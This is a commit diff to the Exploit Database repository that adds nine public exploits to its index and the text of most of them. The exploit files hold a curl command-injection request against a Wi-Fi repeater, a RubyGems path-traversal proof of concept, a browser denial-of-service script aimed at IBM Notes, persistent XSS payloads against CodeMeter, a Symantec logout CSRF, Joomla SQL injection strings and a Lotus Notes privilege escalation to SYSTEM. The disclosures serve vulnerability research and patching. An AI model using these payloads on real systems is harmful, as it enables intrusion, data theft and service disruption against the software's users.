DB: 2017-09-05
9 new exploits IBM Notes 8.5.x/9.0.x - Denial of Service (2) Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation RubyGems < 2.6.13 - Arbitrary File Overwrite Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection Joomla! Component CheckList 1.1.0 - SQL Injection Wireless Repeater BE126 - Remote Code Execution CodeMeter 6.50 - Cross-Site Scripting Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery
This commit is contained in:
parent
8f3c450a42
commit
427165968d
10 changed files with 634 additions and 0 deletions
|
@ -2011,6 +2011,7 @@ id,file,description,date,author,platform,type,port
|
|||
17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0
|
||||
17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0
|
||||
17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0
|
||||
42604,platforms/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
|
||||
17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0
|
||||
17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
|
||||
17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0
|
||||
|
@ -9224,6 +9225,9 @@ id,file,description,date,author,platform,type,port
|
|||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0
|
||||
42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
|
||||
42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
|
||||
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38386,3 +38390,8 @@ id,file,description,date,author,platform,type,port
|
|||
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
|
||||
42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
|
||||
42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
|
||||
42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
|
||||
42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
|
||||
42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
33
platforms/hardware/webapps/42608.txt
Executable file
33
platforms/hardware/webapps/42608.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: WIFI Repeater BE126 – Remote Code Execution
|
||||
# Date Publish: 09/09/2017
|
||||
# Exploit Authors: Hay Mizrachi, Omer Kaspi
|
||||
|
||||
# Contact: haymizrachi@gmail.com, komerk0@gmail.com
|
||||
# Vendor Homepage: http://www.twsz.com
|
||||
# Category: Webapps
|
||||
# Version: 1.0
|
||||
# Tested on: Windows/Ubuntu 16.04
|
||||
|
||||
# CVE: CVE-2017-13713
|
||||
|
||||
1 - Description:
|
||||
|
||||
HTTP POST request that contains user parmater which can give us to run
|
||||
Remote Code Execution to the device.
|
||||
The parameter is not sanitized at all, which cause him to be vulnerable.
|
||||
|
||||
|
||||
2 - Proof of Concept:
|
||||
|
||||
curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
|
||||
/var/mycode;&password=a&port=8&dir=a"
|
||||
--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
|
||||
01:45:46 GMT; langmanulset=yes;
|
||||
sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
|
||||
-X POST http://beconnected.client/cgi-bin/webupg
|
||||
|
||||
3 - Timeline:
|
||||
|
||||
29/4/2017 – Vulnerability Discovered.
|
||||
29/4/2017 - Vendor not responding.
|
||||
03/09/2017 – Exploit published.
|
30
platforms/linux/local/42611.txt
Executable file
30
platforms/linux/local/42611.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.
|
||||
|
||||
Proof of Concept 1: Create a file anywhere
|
||||
|
||||
This PoC attempts to create a file /tmp/malicious-0/BOOOOM.
|
||||
|
||||
1) Download the attached file malicious.gem.
|
||||
2) Run gem install malicious.gem --no-doc.
|
||||
3) /tmp/malicious-0/BOOOOM should be created.
|
||||
|
||||
malicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.
|
||||
|
||||
Proof of Concept 2: Replace rackup command
|
||||
|
||||
This PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.
|
||||
|
||||
1) Download the attached file replace-rackup.gem.
|
||||
2) Run gem install rack -v 2.0.3.
|
||||
3) Run gem install replace-rackup.gem --no-doc.
|
||||
4) Run rackup. It will emit just BOOOOM!.
|
||||
|
||||
replace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.
|
||||
|
||||
Note
|
||||
|
||||
For how to create the malicious gems, see the attached file src.tar.gz.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip
|
42
platforms/multiple/dos/42604.html
Executable file
42
platforms/multiple/dos/42604.html
Executable file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
|
||||
# Date: 31 August 2017
|
||||
# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
|
||||
# Exploit Author: Dhiraj Mishra
|
||||
# Contact: http://twitter.com/mishradhiraj_
|
||||
# Website: http://datarift.blogspot.in/
|
||||
# CVE: CVE-2017-1130
|
||||
# Category: IBM Notes (Console Application)
|
||||
|
||||
|
||||
1. Description
|
||||
|
||||
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
|
||||
|
||||
2. Proof of concept
|
||||
|
||||
<script>
|
||||
var w;
|
||||
var wins = {};
|
||||
var i = 1;
|
||||
f.click();
|
||||
setInterval("f.click()", 1);
|
||||
setInterval(function(){
|
||||
for (var k in wins) {
|
||||
// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
|
||||
if (wins[k] && wins[k].status === undefined) {
|
||||
wins[k].close();
|
||||
delete wins[k];
|
||||
}
|
||||
}
|
||||
w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
|
||||
if (w) {
|
||||
wins[i] = w;
|
||||
i++;
|
||||
}
|
||||
}, 1);
|
||||
</script>
|
||||
|
||||
|
||||
3. IBM Security Bulletin
|
||||
|
||||
http://www-01.ibm.com/support/docview.wss?uid=swg21999384
|
316
platforms/multiple/webapps/42610.txt
Executable file
316
platforms/multiple/webapps/42610.txt
Executable file
|
@ -0,0 +1,316 @@
|
|||
Document Title:
|
||||
===============
|
||||
Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2074
|
||||
|
||||
ID: FB49498
|
||||
|
||||
Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
|
||||
|
||||
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754
|
||||
|
||||
CVE-ID:
|
||||
=======
|
||||
CVE-2017-13754
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-09-04
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2074
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.5
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all
|
||||
solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and
|
||||
reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business
|
||||
workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your
|
||||
applications and libraries. In addition, CodeMeter offers an API for custom integration with your software.
|
||||
|
||||
(Copy of the Homepage: http://www.wibu.com/us/codemeter.html )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official
|
||||
Wibu Systems CodeMeter WebAdmin v6.50 application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
|
||||
2017-05-21: Vendor Notification (Wibu Systems AG - Security Department)
|
||||
2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department)
|
||||
2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team)
|
||||
2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department)
|
||||
2017-09-04: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Wibu-Systems AG
|
||||
Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or
|
||||
module to followup with a compromising attack.
|
||||
|
||||
The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module.
|
||||
The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and
|
||||
after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic
|
||||
validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure
|
||||
the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the
|
||||
attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html`
|
||||
and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and
|
||||
`certified_time.html` files are mared with the execution point of the issue.
|
||||
|
||||
The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management.
|
||||
|
||||
The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
|
||||
Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account.
|
||||
Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and
|
||||
persistent manipulation of affected or connected application modules.
|
||||
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Advanced Settings - Time Server
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] ChangeConfiguration.html
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] server name
|
||||
|
||||
Affected Module(s):
|
||||
[+] time_server_list.html
|
||||
[+] certified_time.html
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Start the CodeMeter software
|
||||
2. Open the webadmin gui
|
||||
3. Move to advanced settings
|
||||
4. Open the time-server module
|
||||
5. Click the plus to add a new time server
|
||||
Note: The request method is POST
|
||||
6. Inject a test script code payload with matching domain and save via POST
|
||||
7. The code is saved and executes of the dbms in the time-server list module index
|
||||
8. Successful reproduce of the vulnerability!
|
||||
|
||||
Note: The method can be automated by usage of post method requester to include a payload.
|
||||
|
||||
|
||||
PoC: Payload (Exploitation)
|
||||
cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>
|
||||
cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")>
|
||||
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com"
|
||||
type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1.
|
||||
</span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa
|
||||
fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down
|
||||
fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons">
|
||||
</span></span></label><input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio">
|
||||
<label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de
|
||||
<span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
|
||||
onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete"
|
||||
onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="TimeServerId4"
|
||||
name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4">
|
||||
<span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);">
|
||||
<span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility:
|
||||
visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);">
|
||||
<span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="cmtime.codehacker.de/>" <img="" src="evil.source">"
|
||||
type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label"
|
||||
for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!]
|
||||
class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up"
|
||||
onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
|
||||
onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span>
|
||||
<span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div>
|
||||
|
||||
|
||||
--- PoC Session Logs (GET) ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:22350/actions/ChangeConfiguration.html
|
||||
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1544]
|
||||
Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:22350]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Content-Type[application/x-www-form-urlencoded]
|
||||
Content-Length[255]
|
||||
Referer[http://localhost:22350/configuration/certified_time.html]
|
||||
Cookie[com.wibu.cm.webadmin.lang=de-DE]
|
||||
Connection[keep-alive]
|
||||
Upgrade-Insecure-Requests[1]
|
||||
POST-Daten:
|
||||
Action[CertifiedTimeConfiguration]
|
||||
TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C]
|
||||
SoapTimeOut[20]
|
||||
certified_time_time_out[20]
|
||||
ApplyButton[Apply]
|
||||
WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv]
|
||||
Response Header:
|
||||
Server[WIBU-SYSTEMS HTTP Server]
|
||||
Date[21 May 2017 16:00:21 +0000]
|
||||
Content-Type[text/html; charset=utf-8]
|
||||
X-Frame-Options[SAMEORIGIN]
|
||||
x-xss-protection[1; mode=block]
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[1544]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:22350/configuration/iframe/evil.source[PAYLOAD EXECUTION]
|
||||
Load Flags[LOAD_NORMAL] Größe des Inhalts[2320] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:22350]
|
||||
User-Agent[zero-zero]
|
||||
Accept[*/*]
|
||||
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
|
||||
Cookie[com.wibu.cm.webadmin.lang=de-DE]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Server[WIBU-SYSTEMS HTTP Server]
|
||||
Date[19 May 2017 21:02:23 +0000]
|
||||
Connection[close]
|
||||
Content-Type[text/html; charset=utf-8]
|
||||
X-Frame-Options[SAMEORIGIN]
|
||||
x-xss-protection[1; mode=block]
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[2320]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:22350/configuration/iframe/evil.source
|
||||
Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:22350]
|
||||
User-Agent[zero-zero]
|
||||
Accept[*/*]
|
||||
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
|
||||
Cookie[com.wibu.cm.webadmin.lang=de-DE]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Server[WIBU-SYSTEMS HTTP Server]
|
||||
Date[19 May 2017 21:06:56 +0000]
|
||||
Connection[close]
|
||||
Content-Type[text/html; charset=utf-8]
|
||||
X-Frame-Options[SAMEORIGIN]
|
||||
x-xss-protection[1; mode=block]
|
||||
X-Content-Type-Options[nosniff]
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[2320]
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:22350/
|
||||
http://localhost:22350/configuration/
|
||||
http://localhost:22350/configuration/ChangeConfiguration.html
|
||||
http://localhost:22350/configuration/certified_time.html
|
||||
http://localhost:22350/configuration/time_server_list.html
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1. Restrict the input field and disallow the usage of special chars like in the other input fields
|
||||
2. Parse the input field and escape the content
|
||||
3. Parse in the visible listing the output location of the item
|
||||
4. Setup a secure exception-handling to handl illegal events
|
||||
5. Include a proper validation mask to the form to prevent further injection attacks
|
||||
|
||||
The security vulnerability has been patched in the version 6.50b.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The seurity risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5).
|
||||
Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
|
||||
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
|
||||
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
|
||||
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
|
||||
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
|
||||
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
|
||||
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
|
||||
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
|
||||
|
27
platforms/multiple/webapps/42613.txt
Executable file
27
platforms/multiple/webapps/42613.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: CSRF
|
||||
# Date: August 9, 2017
|
||||
# Software Link: https://www.symantec.com/products/messaging-gateway
|
||||
# Exploit Author: Dhiraj Mishra
|
||||
# Contact: http://twitter.com/mishradhiraj_
|
||||
# Website: http://datarift.blogspot.in/
|
||||
# CVE: CVE-2017-6328
|
||||
# Category: Symantec Messaging Gateway
|
||||
|
||||
1. Description
|
||||
|
||||
The Symantec Messaging Gateway can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser.
|
||||
|
||||
2. Proof of concept
|
||||
|
||||
The SMG did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://YourIPHere/brightmail/logout.do
|
||||
Here's an attack vector:
|
||||
|
||||
1) Set up a honeypot that detects SMG scans/attacks (somehow).
|
||||
2) Once I get a probe, fire back a logout request.
|
||||
3) Continue to logout the active user forever.
|
||||
|
||||
It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS.
|
||||
|
||||
3. Symantec Security Bulletin
|
||||
|
||||
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00
|
25
platforms/php/webapps/42606.txt
Executable file
25
platforms/php/webapps/42606.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Survey Force Deluxe 3.2.4 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 03.09.2017
|
||||
# Vendor Homepage: http://joomplace.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/survey-force-deluxe/
|
||||
# Demo: http://demo30.joomplace.com/our-products/survey-force-deluxe
|
||||
# Version: 3.2.4
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/42607.txt
Executable file
29
platforms/php/webapps/42607.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 03.09.2017
|
||||
# Vendor Homepage: http://joomplace.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
|
||||
# Demo: http://checklistdemo.joomplace.com/
|
||||
# Version: 1.1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/[PROFILE][SQL].html
|
||||
# http://localhost/[PATH]/[TAG][SQL].html
|
||||
# http://localhost/[PATH]/[CHECKLIST][SQL].html
|
||||
#
|
||||
# our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
36
platforms/windows/local/42605.txt
Executable file
36
platforms/windows/local/42605.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation
|
||||
# Date: 02-09-2017
|
||||
# Exploit Author: ParagonSec
|
||||
# Website: https://github.com/paragonsec
|
||||
# Version: 8.5 & 9.0
|
||||
# Tested on: Windows 7 Enterprise
|
||||
# CVE: CVE-2015-0179
|
||||
# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029
|
||||
# Category: Local & Privilege Escalation Exploit
|
||||
|
||||
|
||||
1. Description
|
||||
|
||||
Lotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights.
|
||||
This can be leveraged to run a program under the System context and elevate
|
||||
local privileges.
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
First you need to execute nsd.exe under the monitor/CLI mode:
|
||||
|
||||
> nsd.exe -monitor
|
||||
|
||||
Next, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.
|
||||
|
||||
nsd> LOAD CMD
|
||||
|
||||
You will see that cmd is opened as System now.
|
||||
|
||||
Also, NSD can be used to attach, kill processes or create memory dumps under the System context.
|
||||
|
||||
|
||||
3. Solution:
|
||||
|
||||
This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.
|
87
platforms/windows/local/42612.py
Executable file
87
platforms/windows/local/42612.py
